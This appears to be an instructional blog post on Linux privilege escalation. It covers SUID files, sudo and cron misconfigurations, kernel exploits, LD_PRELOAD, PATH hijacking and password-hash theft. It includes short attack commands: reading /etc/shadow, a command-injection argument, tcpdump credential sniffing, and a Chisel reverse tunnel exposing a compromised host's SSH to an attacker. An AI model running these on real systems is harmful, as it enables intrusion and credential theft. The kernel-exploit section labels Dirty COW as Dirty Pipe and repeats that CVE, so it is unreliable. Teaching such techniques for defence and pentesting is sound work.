Hi, I’m Slayer. In this paper, I will talk about privilege escalation in Linux. I recommend that, while reading this paper, also go testing the techniques in practice, as this will help to better understand the concepts and apply the knowledge acquired more effectively.

Introduction Link to heading

Privilege escalation is the process of gaining higher levels of access or control on a system than originally allowed. On Linux systems, this often involves elevating a common user to root privileges or exploiting poorly configured permissions to access restricted resources. This technique is widely used in attacks to compromise systems and extend the range of an invasion.

Scaling privileges can occur in different ways, either to gain greater control within the same level of access or to achieve higher levels of privilege, such as root. In the next topic, we will detail the differences between horizontal and vertical scaling.

Horizontal Escalation X Vertical Escalation Link to heading

Horizontal escalation occurs when an attacker gains access to the accounts or permissions of another user at the same privilege level, such as a co-worker on a corporate network. Vertical scaling involves obtaining higher permissions, such as that of an administrator or root, allowing full control over the system. Both methods can be used together to explore different layers of an environment.

Fundamental Concepts Link to heading

After the introduction, before you start scaling privileges, it is obvious that you should know at least the basic and fundamental concepts of Linux, such as the operation of file permissions, groups and users, folder structure, system configuration, etc. If you do not have this basic knowledge about Linux, do not waste your time reading this paper.

PrivEsc Techniques (misconfigs) Link to heading

SUID Files Link to heading

Files with the SUID (Set User ID) permission allow the process generated by the file to run with the permissions of the owner, not the user running it. This can be a major vulnerability if SUID files are misconfigured, as any ordinary user can gain elevated privileges when running these files. A classic example would be a SUID file belonging to root that, if misconfigured or with vulnerabilities, could be exploited by an attacker to gain root access. Commands such as “find” can be used to locate SUID files on a system and check for vulnerable files.

find / -perm /4000 2>/dev/null

This command for example, searches from the root directory for files with the SUID permission enabled.

Sudo With Misconfig Link to heading

The sudo configuration file defines who can run commands as root and which commands can be run. Incorrect configuration can allow a user to execute commands with elevated privileges without proper authentication. To check sudo configuration, use:

sudo cat /etc/sudoers

If the sudoers file allows execution of commands as root without password, or if an ordinary user has excessive permissions, this can be exploited to escalate privileges! (Note: Remembering that the file “/etc/sudoers” by default can only be modified and read by root!)

Crontabs With Misconfig Link to heading

Crontabs are used to schedule automatic tasks. If a crontab is misconfigured, with excessive permissions, an attacker can modify the cron job to execute arbitrary commands with elevated privileges. To check crontabs, run:

crontab -l

In addition, checking system crontabs can be done by inspecting the files in /etc/cron.d/ and /var/spool/cron/crontabs!

PrivEsc Techniques (Vulnerabilities) Link to heading

Kernel exploits Link to heading

Vulnerabilities in the Linux kernel allow attackers to elevate privileges by exploiting flaws in critical systems logic. Two of the most famous are:

Dirty Pipe (CVE-2022-0847): This vulnerability occurs due to a race condition in the copy-on-write (Copy-On-Write) implementation in the Linux kernel. This allows an attacker with write access to a file, even if protected, to modify its contents. For example, a critical configuration file such as /etc/passwd can be changed to add a root user.

Dirty Pipe (CVE-2022-0847): Similar to Dirty COW, but specific to systems with newer kernels. It exploits flaws in the handling of buffers in Linux pipelines. An attacker can inject data into read-only files, such as system logs, to execute malicious commands. The exploitation process involves manipulating data at the read buffer level.

Both vulnerabilities require a specific exploit, which can be found on bases such as the Exploit-DB.

Root Services Link to heading

Services running as root pose one of the biggest security risks on Linux systems, as any vulnerability in these services can be exploited to gain elevated privileges. The fact that a service runs with root privileges means that it has unrestricted access to the system, being able to modify critical files, execute privileged commands and, in many cases, compromise the integrity of the entire system. Therefore, it is essential that only the services that are really necessary for the operation of the system run with these privileges, and that they are configured correctly.

Many services, especially web servers, databases, and file servers, often run as root to perform specific operations that require access to restricted resources. A classic example is the nginx or apache web server, which may need to access directories or files with restricted permissions, such as logs or system configuration files. If one of these services is misconfigured, an attacker could exploit flaws to inject malicious code, gain access to the system, or even escalate privileges.

One of the most common ways of exploiting services that run as root is RCE. This occurs when an attacker manages to have the service execute arbitrary commands on the system, often by taking advantage of vulnerabilities such as buffer overflows, input validation failures, or improper authentication. An attacker could, for example, send a malicious request to a web server that allows the execution of an arbitrary script. If this server is running as root, the attacker can gain full control over the system and can create backdoors for future access. To identify which processes are running as root, you can run:

ps aux | grep root

Dynamic Libraries Link to heading

Dynamic library exploitation is a technique used to change the behavior of legitimate programs by causing them to load and execute malicious code. This technique is based on the operation of the Linux system, which allows programs to load external libraries during their execution. The LD_PRELOAD and LD_LIBRARY_PATH environment variables are essential in this process because they control the order in which libraries are loaded.

The most common scanning technique involves the LD_PRELOAD variable. When a program runs with this variable configured, the system loads a specified library before any other system library. This means that by manipulating this variable, you can have the program perform functions from a library other than the original. For example, you can replace functions such as system(), execve(), or setuid() to modify the behavior of the program, allowing unwanted actions to be performed, such as executing commands with elevated privileges.

This type of exploitation happens when a program, especially those that have high permissions, does not properly validate environment variables. This allows, by manipulating the LD_PRELOAD variable, a malicious library to be loaded before the original program. From there, the library can overwrite important functions of the program, allowing, for example, the execution of commands on the system without the legitimate program noticing.

As an example, imagine that a program uses the system() function to execute commands. If it doesn’t clean up the environment variables before doing so, you can create a malicious library that modifies the execution of this function, causing commands to run with root privileges. This can be done by creating a library that replaces the setuid() function to change the program user ID and grant full access to the system.

Another form of exploitation happens with the LD_LIBRARY_PATH variable, which specifies the directories where the system searches for libraries. If a program trusts this search path in an insecure way, it is possible to manipulate the variable to point to a malicious version of a library. This causes the program to use a compromised version of the library, which can perform actions that are harmful to the system.

In addition, there is the possibility of library hijacking, where a malicious version of a library is placed in a directory where the system expects to find libraries. If the program searches for a library in this directory, it will end up using the modified version, which allows the malicious code to run.

Nowadays, some security measures can make these attacks difficult, such as configuring ld.so to block the manipulation of LD_PRELOAD in programs with high permissions or the use of resources such as ASLR, which makes it more difficult for an attacker to predict where libraries will be loaded into memory. However, if the right precautions are not taken, dynamic library exploration can still be an effective technique for gaining root access to systems.

Command Injection Link to heading

Command injection occurs when a script, which runs with privileges such as root, does not properly validate the inputs it provides, allowing malicious commands to be entered and executed. This can happen in automation scripts, such as backups or file cleanup, that accept user inputs without proper verification.

For example, a backup script that takes a directory as an argument can be manipulated to execute a malicious command, such as:

./backup.sh "/home/user; id"

The main cause of this vulnerability is the use of functions such as eval or system, which execute commands directly, without validating the entries.

Path Hijacking Link to heading

Path Hijacking occurs when an attacker manipulates the search path for executables on the system (using the PATH environment variable) to force the system to execute a malicious file instead of a legitimate executable. This can be done by adding attacker-controlled directories to the beginning of the PATH variable, causing programs to search for and execute compromised versions of binaries or scripts.

For example, if the attacker manages to change the PATH variable to include a directory where a malicious binary was placed, the system may end up running that binary instead of the original one. Assume that a script or command attempts to run a program such as ls or cat. If the directory containing a malicious binary of ls or cat is listed before the default directory, the system will run the malicious binary, or which may contain code to gain elevated privileges or execute malicious commands.

export PATH=/path/malicious:$PATH

This can allow the attacker to execute commands without the system running legitimate versions of these programs.

PrivEsc Techniques (Credentials/Tokens) Link to heading

Theft Of Hashes/Passwords Link to heading

The theft of hashes and passwords occurs when an attacker can access and extract the hashes of passwords stored in files such as /etc/shadow on Linux. The /etc/shadow file stores the encrypted passwords (in hashed form) of the system users. If an attacker manages to access this file, they can attempt to crack the hashes and obtain the original passwords.

Typically, passwords in Linux are stored in encrypted form, using algorithms such as MD5, SHA-512, or bcrypt. However, these hashing algorithms are not reversible, that is, it is not possible to directly retrieve the original password from the hash. However, with hash extraction, an attacker can use techniques such as brute force or rainbow tables to try to guess the original password.

For example, if the attacker can read the /etc/shadow file, which contains users’ passwords, they can use tools such as John the Rapist (John the Ripper) or Hashcat to try to crack the hashes and get the passwords. The following command can be used to extract passwords from a /etc/shadow: file

sudo cat /etc/shadow | grep user

This reveals the hash of the specified user password. From there, the attacker can try to guess the password through brute force attacks or using pre-computed tables! (Note: Again saying the obvious, /etc/shadow can usually only be accessed by root.)

Keyloggers & Sniffers Link to heading

Keyloggers and sniffers are tools used to capture credentials by exploiting different points of the system. While keyloggers monitor and record everything that is typed by the keyboard, sniffers intercept and analyze network traffic to extract sensitive information, such as usernames and passwords.

Keyloggers can be implemented as software or hardware. In the case of software, they integrate with the S.O to record keyboard inputs. A keylogger can be installed on a compromised system through malware, social engineering, or physical access. Once active, it records everything the user types, including credentials used for login, access to banking services, and other sensitive data.

For example, a simple keylogger can be implemented as an LKM that intercepts keyboard-related system calls. This can be done in Linux by manipulating devices such as /dev/input/ to capture keystrokes. The log generated by the keylogger can be stored locally or sent to a remote server.

Sniffers work by intercepting packets of data that travel across the network. They are especially effective on unencrypted networks, where sensitive information such as credentials can be captured in plain text. Tools such as Wire Shark (Wireshark) or tcpdump are used to capture and analyze packets. For example, on an unprotected network, an attacker might use a command such as:

tcpdump -i eth0 -A port 80

This command captures HTTP (not encrypted) traffic on the eth0 network interface, where credentials sent in forms can be intercepted.

Automatic Tools Link to heading

LinPEAS Link to heading

LinPEAS (Linux Privilege Escalation Awesome Script) is an audit tool that automates the search for privilege escalation vectors on Linux systems. It scans the system for vulnerabilities such as unsafe settings, SUID files, incorrect permissions, misconfigured services, and more. LinPEAS is widely used for its detailed and comprehensive approach.

Linux Exploit Suggester Link to heading

Linux Exploit Suggester is a tool that identifies possible Linux kernel vulnerabilities on the target system. Based on the kernel version, it suggests known exploits that can be used to gain elevated privileges. It is especially useful for determining specific exploits that can be applied to the system.

GTFOBins Link to heading

GTFOBins is a collection of Unix binaries that can be exploited to scale privileges, execute commands, or escape from restricted environments such as chroot or containers. The platform offers an online database and allows you to search for specific binaries and the associated exploitation methods. It is an indispensable tool for pentesters and security researchers.

Useful Tools Link to heading

Strace Link to heading

Strace is a tool that allows you to track syscalls made by a running process. It is widely used for debugging and behavior analysis of programs. By looking at syscalls, you can identify interactions with files, networks, or even vulnerabilities in poorly designed binaries.

strace -o output.txt ./programa

Ltrace Link to heading

Ltrace is similar to strace, but focuses on tracking calls to dynamic libraries (such as libc). It is useful for observing interactions with functions such as printf, malloc, or specific calls to external libraries, which can reveal vulnerabilities or unexpected behaviors.

ltrace ./programa

Gdb Link to heading

Gdb (GNU Debugger) is a powerful tool for debugging programs. It allows you to analyze the execution of a binary in real time, inspect memory, modify registers, or even exploit vulnerabilities such as buffer overflows.

gdb ./programa

With this, you enter the interactive environment of gdb, where you can define breakpoints, analyze the flow of the program and exploit vulnerabilities.

Task automation Link to heading

LinEum Link to heading

LinEnum is a script that automates the collection of information from Linux systems to identify possible privilege escalation vectors. It checks permissions, sensitive files, SUID binaries, crontabs and more, saving time on manual audits.

PSPY Link to heading

Pspy is a lightweight tool that monitors processes running on the system without requiring elevated permissions. It is useful for identifying scripts, cron tasks, or running services that can be exploited.

Chisel Link to heading

Chisel is a reverse tunneling and port forwarding tool. It is useful for establishing connections between compromised machines and the attacker, especially in environments where network access is restricted.

Example usage:

On the attacker (server mode):

chisel server -p 8000 --reverse

On the compromised machine (client mode):

chisel client ip do atacante:8000 R:8000:localhost:22

This command redirects port 22 (usually SSH) of the compromised machine to the attacker!